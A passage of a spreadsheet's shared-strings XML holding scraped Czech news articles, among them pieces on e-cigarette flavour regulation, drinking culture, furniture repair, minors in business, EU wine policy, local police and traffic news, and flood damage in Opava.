    <t>3820</t>
  </si>
  <si>
    <t>20241001_79_2996774054_f868ee58af4c25e006c4.html</t>
  </si>
  <si>
    <t>f868ee58af4c25e006c4</t>
  </si>
  <si>
    <t>Konec „kouření“ cukrové vaty a sušenek. Ovocné příchutě zůstanou, přísnou regulaci nechce ani EU</t>
  </si>
  <si>
    <t>Konec &amp;amp;bdquo;kouření&amp;amp;ldquo; cukrové vaty a sušenek. Ovocné příchutě zůstanou, přísnou regulaci nechce ani EU Kristýna Matějková redaktorka Obliba e-cigaret a vaporizérů mezi mladými Čechy roste. Slouží jako méně škodlivá alternativa běžného kouření, ale zároveň k závislosti na nikotinu přivádí více lidí. Autor ▪ Shutterstock D enně si zakouří klasickou nebo elektronickou cigaretu třetina všech mladých Čechů mezi 15 a 24 lety. Zejména u nikotinových alternativ, které se prodávají ve vizuálně zajímavých barevných provedeních, mají podle oficiálních průzkumů mladí lidé dojem, že nejsou příliš škodlivé. Původní radikální plán zakázat veškeré příchutě e-cigaret a přidávání sladidel ale ministr zdravotnictví Vlastimil Válek (TOP 09) nakonec mírní – po vlně kritiky od odborníků i prodejců. O možném zpřísnění podmínek se ministerstvo poprvé zmínilo letos v srpnu. „V posledních letech došlo k enormnímu nárůstu užívání nikotinových výrobků mezi mladými lidmi a zejména dětmi. Oba zdravotní výbory ve sněmovně a v senátu požadovaly úpravu vyhlášky tak, aby výrobky nebyly pro tyto skupiny osob lákavé,“ uvedl tehdy mluvčí resortu Ondřej Jakob . Nyní se ale Válek rozhodl návrh přepracovat a zmírnit. Uvedl to na čtvrtečním jednání sněmovního výboru pro zdravotnictví. „ Evropská unie po nás zákaz příchutí nechce, měli bychom mnohem přísnější normu,“ přiznal s tím, že by se mohly výrobky do Česka dostávat ze sousedních zemí, kde zakázané nejsou. Omezit by se tak podle něj mohly jen některé příchutě. Podle informací HN by mělo jít o zákaz nyní častého označování příchutí po cukrovinkách, například čokoládových sušenkách nebo cukrové vatě. Naopak by výrobci mohli dále používat „klasické“ názvy příchutí typu vanilka nebo borůvka. Konečný návrh upravené vyhlášky momentálně ministerští úředníci vypracovávají a není jasné, kdy bude hotový. Válek ustoupil po vlně kritiky jednak ze strany výrobců elektronických cigaret a vaporizérů, podle nichž by původní návrh vyhlášky byl likvidační pro celý sektor. „Neřešilo by to tolik otázku užívání mladistvými, protože by se celý byznys přenesl na černý trh. Každá večerka by to zřejmě měla pod pultem,“ myslí si jeden z prodejců Milan Sobotka . Nikotinové alternativy bez příchutí se zároveň podle něj vůbec neprodávají. Sami obchodníci podle něj navrhují jako další řešení upustit od vizuálně zajímavých obalů, které obsahují například obrázky superhrdinů, a můžou být proto velkým lákadlem pro mladistvé. A proti byli i odborníci. Kritizovali, že tím stát vezme kuřákům méně škodlivou variantu, k níž řada z nich od klasických cigaret přešla. „Nebezpečí, že se vrátí ke klasickým cigaretám, je opravdu vysoké. E-cigarety jsou přitom prokazatelně šetrnější nejen k samotnému uživateli, ale zejména k jeho okolí,“ myslí si například adiktoložka Marie Funke, která pracuje v pražské klinice Adicare. Postupný přechod vyššího počtu Čechů na elektronickou alternativu kouření potvrzují i oficiální čísla Národního monitorovacího střediska pro drogy a závislosti – zatímco v roce 2021 více než polovina uživatelů e-cigaret kouřila i ty klasické, o rok později už to byla jen asi třetina. Trend ale není jen pozitivní a zájem o alternativy mají i lidé, kteří dříve nekouřili – téměř třetina Čechů, která podle údajů střediska užívá e-cigarety, nikdy nekouřila klasický tabák. Podle Funk e proběhly totožné debaty o zákazu příchutí nedávno například i ve Švédsku , ale pro nedostatek pádných argumentů z toho sešlo. „Obecně se domnívám, že prodejní restrikc e vliv na výskyt závislostí příliš nemají, “ dodává odbornice s tím, že příkladem může být americká prohibice, která zhruba před sto lety vedla pouze k rozvoji černého trhu s alkoholem . Bývalý protidrogový koordinátor Jindřich Vobořil věří, že namísto změn je třeba spíše začít lépe vymáhat stávající zákony – tedy lépe kontrolovat, aby nedocházelo k prodeji nikotinových výrobků lidem mladším 18 let. Zejména by měly podle něj kontrolní orgány častěji přistupovat k odebrání licence obchodu, který takový výrobek nezletilým prodá. S tím souhlasí například i předsedkyně sněmovního zdravotního výboru Zdeňka Němečková Crkvenjaš ( ODS ). „K zákazu činnosti se nepřistupuje skoro vůbec,“ přiznává. #tabákový průmysl #cigarety #tabák #zdravotnictví #Válek Vlastimil #závislost #newsletter 7 v Sedm Tento článek máte je zdarma. Když si předplatíte HN, budete moci číst všechny naše články nejen na vašem aktuálním připojení . Vaše předplatné brzy skončí. Předplaťte si HN a můžete i nadále číst všechny naše články. Nyní první 2 měsíce jen za 40 Kč. Veškerý obsah HN.cz Možnost kdykoliv zrušit Odemykejte obsah pro přátele Ukládejte si články na později Všechny články v audioverzi + playlist za 40 Kč nebo za 80 Kč Navíc mobilní aplikace a web bez reklam Autor: Kristýna Matějková Autor person Kristýna Matějková Rubrika transition_slide HN</t>
  </si>
  <si>
    <t>104100</t>
  </si>
  <si>
    <t>112750</t>
  </si>
  <si>
    <t>20241001_8_2998025356_db537911eb96018a386b.html</t>
  </si>
  <si>
    <t>db537911eb96018a386b</t>
  </si>
  <si>
    <t>Jak se z piva a vína stal elixír moderního životního stylu</t>
  </si>
  <si>
    <t>Jak se z piva a vína stal elixír moderního životního stylu autor: Redakce Nezdrave.cz | 01.10.2024 | Chlast Dneska se podíváme na to, jak se za posledních pár let z obyčejné láhve piva nebo vína stal symbol úspěchu, vzdělanosti a tak trochu i odpoutání se od každodenní reality. Úspěšné yuppies si užívají každý doušek, zatímco boomers v koutku blekotají o tom, jaký to byl předtím život, když se dalo pít levně. Ať už jste zástupcem jakékoli generace, jedno je jisté – chlast už dávno není jen nápoj, ale spíše status, který s sebou nese celou řadu souvisejících hodnot, pravděpodobně spojených s Instagramem. Věděli jste, že víno , které si objednáváte v trendy restauraci, může mít více než tisícíletou historii? Představte si, že první vinařství byly založeny už ve starověkém Egyptě a víno se používá na oslavy, rituály a dokonce i jako medicína. To přece nemůže být náhoda. Dneska, když si objednáváme červené na letní terase a tváříme se, jak jsme sofistikovaní, si vlastně ani neuvědomujeme, že tahle vášeň pro chlast existuje už od chvíle, kdy lidé začali experimentovat s fermentací. Jaká ironie, že to, co dnes považujeme za znak bohatství, bylo tehdy revolučně nazýváno „brutální potřebou zapít nedělní oběd“. DIY nebo ready-made? Začněte s vlastními drinky! Nebudeme si nalhávat, pořád a pořád slyšíme o neustále rostoucí popularitě domácí výroby alkoholických nápojů. Místo toho, abychom jsme se smířili se sazením na předražených bary, se raději pustíme do mixování koktejlů doma, kdy vytváříme koktejly jako umělci na plátně. Vzít starý rodinný recept na slivovici a dát mu moderní twist? Geniální! Při troše štěstí se můžete dostat na úroveň „barman ve své kuchyni“ a zároveň se vyhnout snobské atmosféře barů, kde se drze mluví o „nosech“ a „tělech“ vín. Hlavně, od toho se nikdo zároveň nějak neotráví! Když už mluvíme o bistru a cinkání sklenic. Hodně lidí dnes považuje craft pivo za něco víc než jen pěnu a vodu. Je to vlastně umění. S obrovským množstvím mikro pivovarů, které denně chrlí nové druhy a chutě, musejí běžné supermarkety začít používat gps, aby se v té záplavě zorientovaly. Po pivu , které v sobě nese chuť pomeranče s lehkým tónem kvetoucích jasmínů, se zřejmě budete cítit jako moderní umělec, i když pravda je taková, že jste se jen chtěli opít. Kde je hranice mezi obyčejným a extravagantním? Tak teď se dostáváme k tomu, co skutečně dělá z pití umění. Není to jen o tom, kolik zaplatíte nebo jak vypadá vaše sklenička. Je to o zážitku! Od pití sauer piva po barevné koktejly, v dnešní době je všechno zabaleno do krásných obalů, co se pak vyfotí a ukáže na Facebooku. Budeme-li mluvit pravdu, pokud nejste schopni udělat perfektní selfie vedle bublinkového drinku, pak se špatně díváte na to, jak moderní zapadáte do městského života. Nekončící debaty o tom, zda je Chardonnay nebo Merlot lepší, mohou být otravné, stejně jako ti, kdo se vzpírají moderním trendům. Představte si však tu pohodu, když se s přáteli sejdete v oblíbeném baru a sdílíte dobré chvíle u výtečného vína nebo osvěžujícího drinku. Kdo říká, že pití nemůže být zážitkem plným smíchu a sofistikované konverzace? V dnešním světě neexistuje jediný důvod, proč byste se měli cítit vinni za to, že si užíváte dobré pití. Aspoň dokud nezapomenete na to, že zase zítra musíte do práce! Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241001_80_3001328467_ef5c9e77b4bc4df29b8d.html</t>
  </si>
  <si>
    <t>ef5c9e77b4bc4df29b8d</t>
  </si>
  <si>
    <t>Jak zakrýt vruty v nábytku pomocí japonské pily</t>
  </si>
  <si>
    <t>Jak zakrýt vruty v nábytku pomocí japonské pily -Teď by to mohlo být podehrané skladbou Samuraj, protože mám v ruce japonskou pilu. Oni mají to úplně obráceně. To znamená, že ty zuby směřují při řezání k nám. Nemusíte tlačit jako u těch pil, které máme tady v Evropě . Vlastně řežeme tím tahem k sobě. Geniální nápad. Důležitý je, že vlastně se nevlní ani ten list a ten řez bude, jak když střelí, prostě japonský. Krom toho je tady Lukáš. -Ahoj. -Namasté. Co budeme dneska dělat? -Dneska si ukážeme, jak zakrýt vruty, pokud třeba nemáme nějaké hezké nebo původní a chceme použít prostě obyčejné vruty, tak ony nevypadají tak hezky. -Na začátku je potřeba židli zbavit nejdříve toho starého laku. Všechno tady už je očištěné. To už jsi udělal dopředu. To už jsme se taky ukazovali několikrát. K tomu se využívá Cidlina . To znamená, my tady máme takovou, dá se říct, dřevěnou hlazenku, kdybych to nazval, ale on je to vlastně kolíček. -Dřevěná kulatina.-Ano, dřevěná kulatina. Tohle je desítka, to znamená, že použijeme přesně desítku vrták. Jedna věc je, že je tady díra a budeme ji jen zvětšovat. Druhá věc je, že to potřebujeme mít čisté. Ono je to tvrdé dřevo, takže je lepší použít vrták, který je do kovu. Chce to pořádně držet kolmo. A pokud máte možnost mít stojanovou vrtačku, šel bych na stojan, tam to bude jistější. A hlavně opatrně, nesmíte projet úplně. Je to jenom na schování, to znamená, že vrtáme tak do půlky toho materiálu? -Do půlky, radši do třetiny. -Takže je to takový malý pivo . A pokud jste hodináři jako Lukáš, stačí, když vyvrtáte šnita. A když máme vyvrtáno, tak můžeme nasadit zpátky, přišroubovat vruty a nyní nastupuje kulatina. Tu si nakrátíme na nějaké menší kousky, abychom to mohli zalepit naráz. V klidu, pomalu, nespěcháme. Tu stranu, která půjde dovnitř, tak začistíme na smirkovém papíru, aby se nám to tam pěkně do toho otvoru dalo vložit. A teď už vezmeme lepidlo. Zase záleží, kde ta židle bude stát. Já bych volil vždycky raději minimálně D2, D3, to je sichr, že je jedno potom, kam židli postavíte, jestli je ve vlhku nebo není. Tou očištěnou stranou vložíme ten náš kolíček a doklepneme opatrně kladívkem. Když lepidlo řádně zaschlo, vezmeme japonskou pilku nebo jinou pilku a čím menší jsou ty zoubky u pilky, tím lepší u toho tvrdého dřeva. Když to máme odříznuté, tak Lukáši, asi pravděpodobně vytvarujeme, to znamená, dobrousíme do tvaru a židle bude jak nová. Lukáši, díky moc. Myslím, že to bylo inspirativní a vy, když se pustíte třeba do takové renovace židle, tak ať se vám to podaří a židle vydrží třeba na 1, 2, 3, další generace. Japonská pil má zuby opačně než naše pila česká. Pracuje se s ní tedy obráceně, tahem od sebe. Díky tomu vytvoříme velmi rovný a hladký řez. Dřevěná židle z kulatiny nebo ratanu také občas potřebuje opravit nebo zrenovovat, proto vám ukážeme, jak taková renovace probíhá pod rukama zkušeného řemeslníka. Pořad: Libovky Pepy Libického</t>
  </si>
  <si>
    <t>20241001_81_2996151030_decfe609eae1f1b00df2.html</t>
  </si>
  <si>
    <t>decfe609eae1f1b00df2</t>
  </si>
  <si>
    <t>Nezletilí podnikatelé? Ve světě běžné, u nás stále spíše rarita Influenceři, grafici, programátoři a IT testeři. I když je podnikání u nás stále jednoznačnou doménou dospělých, pomalu přibývá případů, kdy si vlastní byznys zřizují mladí ve věku hluboko pod hranicí dospělosti. Zákon to umožňuje, je ale třeba překonat několik právních překážek. Legislativa u nás, ale i například v Německu , je přísnější než třeba v USA , kde je podnikání mladých relativně snazší a běžnější. "V České republice potřebují nezletilí pro podnikání souhlas zákonných zástupců a schválení soudu," uvedl Daniel Macek z advokátní kanceláře MACEK.LEGAL, která se mimo jiné na podobné případy mladých podnikatelů zaměřuje. Zájemci o podnikání, kterým ještě nebylo 18 let, mají podle něj tři možnosti. "První varianta je, že se rozhodnou podnikat prostřednictvím odpovědného zástupce, který ale musí splňovat všeobecné i zvláštní podmínky provozování živnosti. Navíc jeho ustanovení musí schválit soud," vysvětlil Macek. Druhou možností je podle něj obrátit se na soud a požádat o souhlas s konkrétní samostatnou výdělečnou činností. "Zájemce musí mít souhlas zákonného zástupce a musí počítat s tím, že bude u soudu prokazovat celkovou vyspělost a předpoklady k danému podnikání," upřesnil Macek. Případný souhlas soudu se způsobilostí se pak vztahuje pouze na danou samostatnou činnost. Třetí možností, připomíná Daniel Macek, je požádat soud o přiznání svéprávnosti. "Pokud soud návrhu vyhoví, není už k podnikání potřeba žádná další odpovědná osoba a veškerá obchodní rozhodnutí může činit mladý podnikatel sám," dodal s tím, že přiznaná svéprávnost nezletilému se ale nevztahuje třeba na omezení pití alkoholu , možnost řídit auto nebo na volební právo. Podobně je tomu i v dalších evropských zemích. Naopak v USA není na federální úrovni žádné omezení a v mnoha státech není pro podnikání ani stanovený žádný minimální věk. Podle údajů českého Ministerstva průmyslu a obchodu ( MPO ) bylo u nás ve druhém čtvrtletí tohoto roku evidováno 25 fyzických osob s živnostenským oprávněním pod 18 let. Ve skupině 18-20 let jich již bylo celkem 9 679. Podle Daniela Macka ale zájemců o podnikání z řad nezletilých přibývá. "V poslední době jsme řešili třeba případ mladého programátora, který již dostával zakázky v takové míře, že musel být schopen například vydávat faktury." Mladí chtějí podnikat v IT a sociálních sítích Studie Eurostatu z roku 2022 mezi mladými ve věku 15 - 30 let ve všech 27 zemích EU ukázala, že téměř každý druhý respondent (46 %) by uvažoval o založení vlastního podniku, ačkoli k tomu ještě nepodnikl žádné kroky. Pouze 9 % již začalo podnikat a dalších 14 % podniká kroky k zahájení podnikání. Jako obor vlastního podnikání by si nejčastěji zvolili odvětví IT, internetu, elektronického obchodu nebo sociálních médií (13 %), dále pak umění, design, kulturu (10 %), obchod, prodej a maloobchod (9 %) a pohostinství, zábavu a cestovní ruch (9 %). Jako největší překážku v podnikání vidí mladí nedostatek kapitálu, 37 % z dotázaných. Čtvrtina pak uvedla jako největší překážku přílišnou byrokracii a administrativu. Jak soud rozhoduje o žádostech o přiznání svéprávnosti? 2018 2019 2020 2021 schválení souhlasu (přivoleno) 5 7 9 15 schválení odvolání souhlasu 0 jiný výsledek 1 4 1 2018 2019 2020 2021 svéprávnost přiznána 20 17 19 svéprávnost nepřiznána 0 1 5 2 jiný výsledek 14 12 Zdroj: MACEK.LEGAL Zdroj údajů MPO: https://www.mpo.gov.cz/cz/podnikani/zivnostenske-podnikani/statisticke-udaje-o-podnikatelich/pocty-podnikajicich-fyzickych-osob-a-zivnostenskych-opravneni-dle-vekove-struktury--225459/ Zdroj Eurostat : https://europa.eu/eurobarometer/surveys/detail/2670 Autor: TYDEN, www.tyden.cz, e-mail: webmaster@tyden.cz Rubrika transition_slide Byznys</t>
  </si>
  <si>
    <t>20241001_82_2995936140_d9fefb472ba320318c9a.html</t>
  </si>
  <si>
    <t>d9fefb472ba320318c9a</t>
  </si>
  <si>
    <t>Vyhlídky evropského vinařství s novým eurokomisařem</t>
  </si>
  <si>
    <t>Vyhlídky evropského vinařství s novým eurokomisařem Předsedkyně Evropské komise Ursula von der Leyen v polovině září oznámila nové složení komise. Na post eurokomisaře pro zemědělství byl navržen Christophe Hansen , lucemburský poslanec Evropského parlamentu , jenž by měl hrát klíčovou roli při návrhu a vyjednávání o novém rámci Společné zemědělské politiky. Jeho vedení může vést k významným změnám ve způsobu, jakým Evropa podporuje svá zemědělská odvětví, včetně vinařství. „Problematiku spojenou s vinařským sektorem je nutné řešit společně a koordinovaně. Evropská komise ukázala, že si toto plně uvědomuje, což dokazuje i vytvoření High-Level Group, která se tématu evropského vinařství chce věnovat více do hloubky. Volbu pana Hansena vítáme a věříme, že jeho zkušenosti a vize budou pro náš obor přínosem,“ uvedl Martin Chlad, prezident Svazu vinařů České republiky . Hansenova nominace přichází v době, kdy vinařský sektor čelí výzvám spojeným s globální konkurencí, nesystémovými politickými kroky či změnami klimatu a spotřebitelského chování. Jeho vedení by mohlo utvářet budoucnost evropského vinařství, zvláště v reakci na ekonomické napětí a důraz na udržitelnost. V centru zemědělských debat je tlak na snížení byrokracie a spravedlivější rozdělování prostředků v rámci Společné zemědělské politiky a podpora menších zemědělských subjektů, což je plně v souladu s Hansenovým zaměřením na rovnost a udržitelnost. Nasměrováním více zdrojů do malých a středních vinařství by EU mohla pomoci zachovat kulturní a regionální rozmanitost evropských vín. To by umožnilo menším producentům účinněji konkurovat větším výrobcům na masovém trhu a zároveň zajistit, aby se tradičním vinařským technikám a místním odrůdám i nadále dařilo. Další klíčovou oblastí je udržitelnost. Záležitosti týkající se životního prostředí jsou pro vinaře v celé Evropě stále naléhavější, protože změna klimatu zásadním způsobem ovlivňuje regiony, kde se pěstuje réva vinná. Důležitá bude rovněž Hansenova role v obchodních jednáních. Evropa je největším vývozcem vína na světě a mezinárodní obchodní dohody hrají klíčovou roli. Očekává se, že se Hansen pravděpodobně zaměří na zajištění toho, aby evropští výrobci vína mohli spravedlivě konkurovat na celosvětové scéně a zároveň chránit jedinečnost svých produktů formou zeměpisných označení, která jsou zásadní pro zachování integrity a identity evropských vín.</t>
  </si>
  <si>
    <t>20241001_83_2996030486_6131239310c0167e19dc.html</t>
  </si>
  <si>
    <t>6131239310c0167e19dc</t>
  </si>
  <si>
    <t>Chebští strážníci v akci: Opilý motorkář, první pomoc a další stovky případů</t>
  </si>
  <si>
    <t>Chebští strážníci v akci: Opilý motorkář, první pomoc a další stovky případů Jak se ukázalo, řidič motocyklu si při své zkratce zjevně spletl i svůj palivo-systém – nadýchal totiž 2,21 promile alkoholu , což při opakovaném testu vylepšil na 2,31 promile. Strážníci ho proto rychle předali policii, se kterou ho čekala jiná jízda, tentokrát ovšem bez motorky. Strážníci museli během týdne dvakrát poskytnout první pomoc Prvním byl muž, který se rozhodl přidat do svého týdne trochu dramatu tím, že si na nástupišti zlomil ruku. Druhý nešťastník uklouzl na mokré dlažbě před galerií a způsobil si nepříjemné krvácení z hlavy. Oba byli následně předáni do péče záchranářů. Za uplynulý týden přijala Městská policie Cheb 111 oznámení na tísňovou linku 156, a to rozhodně není malé číslo. Z vlastní činnosti pak řešili strážníci celkem 296 událostí. Kromě dvanácti případů narušování veřejného pořádku a jedné krádeže se také zvládli popasovat s 139 přestupky proti pravidlům silničního provozu. Jak se ukazuje, jednosměrky a parkování asi nepatří mezi silné stránky některých řidičů v Chebu . (PS) Autor: Pavla Sofilkaničová Autor person Pavla Sofilkaničová</t>
  </si>
  <si>
    <t>9240</t>
  </si>
  <si>
    <t>1730</t>
  </si>
  <si>
    <t>20241001_84_2995970886_d8bd3a0652dc322d5d65.html</t>
  </si>
  <si>
    <t>d8bd3a0652dc322d5d65</t>
  </si>
  <si>
    <t>Řetězová nehoda v Kutné Hoře. Tři auta se srazila před přechodem pro chodce</t>
  </si>
  <si>
    <t>Řetězová nehoda v Kutné Hoře . Tři auta se srazila před přechodem pro chodce „Oznámení o střetu tří vozidel jsme přijali ve 14.35 hodin na lince 158. Naštěstí se nestalo nic vážného. Vše se obešlo bez zranění a svou roli nesehrál ani alkohol . Na vině bylo nedobrzdění a nedodržení bezpečné vzdálenosti,“ shrnula poznatky dopravních policistů jejich krajská mluvčí Barbora Schneeweissová. Nehody Jak vyplynulo ze situace přímo na místě dopravní nehody, řetězové srážce ve směru do města předcházelo zastavení Škody Fabia před přechodem pro chodce v těsné blízkosti křižovatky s Vojtěšskou ulicí, zastavit stačila i řidička Škody Rapid, ovšem nikoliv už žena za volantem vozu značky Mercedes. Ten následně natlačil rapid na fabii. Dopravní nehoda na výjezdu z parkoviště u kláštera řádu sv. Voršily do ulice Československých legionářů v Kutné Hoře : autobus srazil chodkyni. | Video: Deník/ Michal Bílek Autor: Luboš Hájek Autor Luboš Hájek</t>
  </si>
  <si>
    <t>6320</t>
  </si>
  <si>
    <t>2470</t>
  </si>
  <si>
    <t>20241001_85_3028635450_944d6f36d5c8c7e06d58.html</t>
  </si>
  <si>
    <t>944d6f36d5c8c7e06d58</t>
  </si>
  <si>
    <t>Potřebujeme nutně novou knihovnu, tělocvičnu, kino a stadion. Zn.: Spěchá</t>
  </si>
  <si>
    <t>Potřebujeme nutně novou knihovnu, tělocvičnu, kino a stadion. Zn.: Spěchá Reportáž z Opavy : Čtyři sportovní a kulturní pilíře slezské metropole sčítají škody a řeší, kdy se po ničivých povodních zase rozjedou Martin Štorkán Primátor Opavy Tomáš Navrátil patřil před dvěma týdny mezi svými kolegy k těm, kdo vzhledem k drtivému dopadu povodní žádali o přeložení voleb na jiný termín. Faktem je, že úder byl mimořádně silný a v padesátitisícovém městě to někde – třeba konkrétně na sídlišti Kateřinky – vypadalo více než týden po povodních jako ve válečné zóně. A už teď je jasné, že škody, které velká voda ve slezské metropoli napáchala, budou miliardové. Zdevastovala nejen soukromý majetek tisíců lidí, ale i základy institucí, které jsou pro každé město klíčové: škola, knihovna, kino nebo třeba místní fotbalový stadion. V jejich příbězích se některé věci – třeba marná snaha toho co nejvíc zachránit – opakují. Některé ale nikoli: odhodlaný ředitel v srpnu přebral školu a hned mu ji spláchla voda, fotbalový klub řeší, kde bude hrát další derby, vytopené kino uspořádalo projekci na balkoně a knihovna ve zmatku stihla zachránit desetitisíce knih. ↓ INZERCE Jsme připraveni – začít znovu Slabý zápach bahna, jehož tenká vrstva stále pokrývá trávníky a ulice, občas provoní dřevo padlého javoru. Ještě do předminulé soboty stínil okna místní školy Šrámkova na opavském sídlišti Kateřinky , v jejímž jednom křídle sídlí pobočka Knihovny Petra Bezruče . Stejně jako ji i strom zničila voda. Na jiném, který zůstal stát, se chvěje odtržená policejní páska a pár metrů od ní se vrší na zemi hromada knih, nad níž by srdce pátera Koniáše zajásalo. Vedle sebe tu bez ladu a skladu leží Ferda Mravenec, Hrdá otrokyně nebo Lincolnův mýtus. Poblíž se povalují plyšová kostka a nefunkční knihoboxy. „Venku leží nějakých devět tisíc knih, které se nám nepodařilo vynést do vyšších pater školy.“ (Zaplavené svazky před kateřinskou pobočkou Knihovny Petra Bezruče připravené na odvoz) Autor: Milan Jaroš Děti běží z družiny a obyvatelé sídliště projíždějí za slunného dne na kole. Obě strany ulice lemují haldy poničených regálů, skříní, židlí a lina čekající na odvoz popelářů, kteří by měli vše svážet do bývalých opavských kasáren k další likvidaci. „Venku leží nějakých devět tisíc knih, které se nám nepodařilo vynést do vyšších pater školy,“ ukazuje na hromadu ředitelka Knihovny Petra Bezruče Markéta Beyerová, která bydlí jen pár ulic od pobočky. Osudnou sobotu byla jednou ze dvou pracovnic knihovny, které první vyrazily zachraňovat, co se dalo – ihned poté, co z magistrátu přišla zpráva, že původně ohlášená padesátiletá voda bude nakonec podstatně horší. Při vstupu do budovy je zatím třeba ještě balancovat na kovové konstrukci schodů – výplně vzala voda. „V sobotu jsme měli pětihodinovou brigádu ve dvaceti lidech,“ říká energická žena ve středních letech. Její slova potvrzují i data, která posbíral její telefon: při přenášení knih vystoupala 46 pater a ušla 18,5 kilometru. Původně v pátek před povodní vyskládali knihy ze spodních regálů do výšky 75 centimetrů. Voda nakonec dosáhla do dvojnásobné výšky. „Sklady a regály už jsme nezvládli,“ dodává a vchází do zadní místnosti, kde býval archiv. Pracovník firmy, která instalovala kovový depozitář, ho právě demontuje, aby se zjistila škoda. „Celý se bude nejspíš muset vyměnit,“ ukazuje přitom na zrezivělá ložiska, jež posouvala těžké regály. Zjistit, co nakonec z archivu vzala voda, bude jeden z dalších úkolů. Beyerová doufá, že tam nebyly žádné cenné výtisky. Ví o mnoha svazcích, které už se netisknou a bude je těžké sehnat. Stejně tak ji mrzí knihy, které měli připravené pro školy, jež si je chodily půjčovat pro čtenářské kluby. Už se jim prý ozývají někteří autoři, že svá díla dodají. Do školy už ano, pro knížky možná až někdy na jaře. (Děti před Základní školou Šrámkova, v jejímž jednom křídle je pobočka knihovny) Autor: Milan Jaroš Pobočka v Kateřinkách je největší ze tří, které Knihovna Petra Bezruče má. Je určená pro téměř třináctitisícové sídliště. Slouží ale i celé Opavě – třeba v případě Klubu maminek, které se tady každý měsíc scházely – a zbyla po něm jen plyšová kostka venku. Zářijové setkání muselo být zrušeno a v dohledné době se budou všechny podobné aktivity – třeba trénování paměti pro seniory nebo svatomartinské slavnosti vína – odehrávat v centrální knihovně. „Zrovna na mě cestou volala jedna čtenářka na kole, kdy otevřeme a jestli si může jít půjčovat věci do centrály,“ říká. Tam už ostatně ze školních chodeb převezli pracovníci knihovny za pomoci vojska zhruba 20 tisíc zachráněných knih. Teď se musí projít a evidovat. Zachránilo se i dalších 4700 svazků půjčených mezi čtenáře. Možná i z nich něco bude utopené, ale Markéta Beyerová doufá, že minimum. Celkově vodě uniklo 75 procent vybavení knihovny i knih. „Utopili jsme majetek za 700 tisíc, zachránili majetek za 1,5 milionu,“ dodává Beyerová. Zaměstnanci uklízeli od úterý do čtvrtka. V pondělí se nedokázali dostat dovnitř kvůli zničeným zámkům. „Máme vlastně hotovo. Musíme ještě osekat sokly, oškrábat omítky, aby to co nejlépe vyschlo, ale to už knihovnice dělat nebudou,“ vyjmenovává Beyerová, co je třeba udělat bezprostředně v další fázi. Otevřenými okny proudí ještě letní vzduch, který jediný zatím místnosti vysouší. Vysoušeče tu neběží, protože elektrické zásuvky byly pod hladinou a není možné je použít. Buď se stáhnou kabely ze školy, nebo se přivezou z centrály. „Čekáme na pokyny z města, co dál. Vědí, že jsme nachystaní. Máme domluvenou firmu a v momentě, kdy nám město řekne, že můžeme začít rekonstruovat, rekonstruujeme," dodává. V padesátitisícovém městě to někde – třeba na sídlišti Kateřinky – vypadalo více než týden po povodních jako ve válečné zóně. Autor: Milan Jaroš Opravy se budou hradit z pojistky města. Pojišťovně už zaslala hrubé odhady. Podle ředitelky půjdou do několika milionů. „Nejhrubší odhad je 1,5 milionu jen na stavební úpravy a 1,5 milionu na nábytek,“ vypočítává. Musí se udělat nové regály i těžké výpůjční pulty. Velkou položku bude nejspíš představovat nový depozitář pro archiv. Podobně těžko jako se odhaduje přesná konečná suma, kterou budou opravy stát, se odhaduje i termín, kdy by mohla znovu pobočka knihovny pro své čtenáře otevřít: „Když otevřeme na jaře, je to optimistický odhad,“ říká unavená ředitelka. Na další plány do budoucna – co by se třeba v knihovně mohlo udělat jinak, aby se situace neopakovala nebo měli větší šanci jí předejít – je zatím příliš brzy. S tím, jak se k nim dostávaly informace z krizového štábu a jak byla celá akce řízená, je ale spokojená. Bylo to krásné – a zase bude Knihovna Petra Bezruče se v Kateřinkách nachází ve stejném objektu jako místní Základní škola Šrámkova . Ta už se po záplavách pomalu probouzí, většina žáků má za sebou první popovodňový vyučovací den a šourají se směrem od žluté školní budovy. Jiří Hromada , který na škole učí sedm let, to tady vede doslova teprve chvilku: letos o prázdninách zvítězil ve výběrovém řízení a v srpnu se stal ředitelem. Projekt v rámci konkurzu postavil mimo jiné na tom, že by rád ještě víc zpřístupnil dětem i veřejnosti velké venkovní sportoviště kousek od školy. Plánoval, že tu budou dělat soutěže a závody v různých sportech, na které je areál vybavený: fotbal, tenis nebo běh. „Je to nové, takže jsme se s tím chtěli i pochlubit,“ říká šestatřicetiletý muž v tílku s tmavými vlasy i vousy. V půlce září ale velká voda plány odnesla. Autor: Milan Jaroš Třísetmetrová běžecká dráha s povrchem z červeného tartanu je po povodních na řadě míst potrhaná a zbyl po ní jen štěrk. Kusy pryže se válejí různě po areálu. V cíli skoku dalekého je místo písku bláto. Umělý trávník na hřišti pro fotbal a házenou se zvlnil a bude se muset vyměnit. Ještě hůř dopadly modré plochy, kde se dalo házet koulí nebo trénovat skok vysoký. Gumový povrch, který tu byl, je naplavený na jedné hromadě. Nepoškozené zůstaly stroje na workout v jednom z rohů areálu. „Kousek od nich byla ještě mobilní toaleta. Měli jsme strach, že tam voda někoho zavřela. Ale hasiči to otevřeli a nikdo nevypadl,“ vtipkuje ředitel. Kromě workoutu se bude muset celé hřiště postavit znovu. „Naštěstí je to pojištěné, půjde to z pojistky města, my totiž celý areál jen spravujeme. Postavilo se to z rozpočtu Opavy a evropských dotací za zhruba 23 milionů korun a takhle krásné to bylo,“ ukazuje na mobilu předpovodňové snímky areálu. Ten se pořádně otevřel teprve loni na jaře poté, co byla škola bez venkovního hřiště několik let. Na odhad, kdy ho budou moci učitelé, žáci i veřejnost opět používat, je podle Hromady ještě brzo. Zatím neví ani to, jak se celá rekonstrukce vyřeší technologicky. Jistý si je naopak tím, že musí co nejdřív zprovoznit dvě vnitřní tělocvičny, které voda ve výšce 140 centimetrů také kompletně zničila. Veškeré vybavení – míče, medicinbaly a další věci – sice vystěhovali nahoru, parkety, které tu byly teprve pár let, se ale musely vyhodit. Stejně dopadlo i dřevěné obložení stěn. Místnosti jsou teď holé, viset zůstaly jen koše na basketbal a gymnastické kruhy. Na straně u oken jsou odhalené radiátory, u kterých topenáři ještě v září opravovali ventily a teď se neví, jestli vůbec budou fungovat. V prosinci tu bude tělák? (Ředitel ZŠ Šrámkova Jiří Hromada ve zničené tělocvičně) Autor: Milan Jaroš Na opravy ale bude muset škola na rozdíl od venkovního sportoviště sehnat peníze sama ze svojí pojistky a vyřešit to ideálně tak, aby příště, až sem zase voda přijde, s čímž tu počítají, byly tělocvičny co nejodolnější. Proto teď vedení školy přemýšlí, jestli položí znova parkety, nebo se 